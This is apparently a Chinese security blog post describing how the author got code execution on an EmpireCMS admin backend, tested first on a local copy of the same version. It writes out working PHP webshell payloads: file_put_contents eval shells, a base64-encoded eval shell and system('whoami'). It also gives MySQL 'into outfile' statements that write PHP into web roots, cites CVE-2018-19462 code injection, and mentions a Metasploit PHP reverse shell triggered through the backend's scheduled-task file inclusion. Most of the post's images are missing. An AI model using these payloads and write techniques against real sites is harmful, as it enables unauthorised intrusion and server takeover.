某次打点过程中,朋友发来一个帝国CMS,真难搞.
不是星标不推送文章了。
师傅也不想吧~
快把极梦C设置成星标吧。
http://127.0.0.1/e/admin 后台 进入了后台为了保险,找到了和目标同版本的本地搭建先进行测试,总体:
1.一些网上没有深究的漏洞,经过研究可以shell
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
<?php file_put_contents("jmc.php","<?php @eval($_POST[jmc]); ?>");?>
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
尝试2 CVE-2018-19462 代码注入
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
因为目标是mysql的需要知道绝对路径。网上找了半天没有,默认尝试写到iis默认路径。
select '<?php @eval($_POST[j m c])?>' into outfile 'c:inetpubwwwroot1.php'
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
本以为成功了,最后发现php被禁止写入了。这里尝试了txt确实可以,但是无法访问到,继续找路径,发现默认安装会有一个跟路径。
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
直接修改成xx.php,内容为:<?php phpinfo();?>发现phpinfo 可以执行。
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
问题1,webshell为空,写不出进去<?php @eval($_POST[jmc]);?>
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
经过不停摸索知道怎么把shell写进去了,但是发现无法执行。(网上的文章说只能phpinfo,这里不信,进行了测试发现可以shell)
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
经过测试,发现这里是把执行的结果提取过来。而不是代码本身的执行。比如<?php echo 'jmc';?>
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
换个思路,去执行命令<?php echo system('whoami');?>
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
ok命令执行成功。也可以执行msf上线。待验证有问题,
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
最后看目录的时候,发现可以成写进去一个shell。
经过测试,可以利用写入的base64解密的方式写shell
<?php file_put_contents("aaa.php",base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg=="));?>
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
因为目标php无法上传。发现后台有一处计划任务。可以文件包含,需要借助sql写入文件才可以。
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
select '<?php phpinfo()?>' into outfile 'C:\G0mini\phpstudy\phpstudy_pro\WWW\web\e\tasks\21234.txt'
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
id=2位webshell一句话 但是无法连接。也没办法执行命令
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
又利用msf进行php反弹,测试了一个半小时。终于成功了一下,这里的计划任务有很大的问题。会中断.
![艰难打点之帝国cms-多层次多方向深度利用day]( "艰难打点之帝国cms-多层次多方向深度利用day")
评论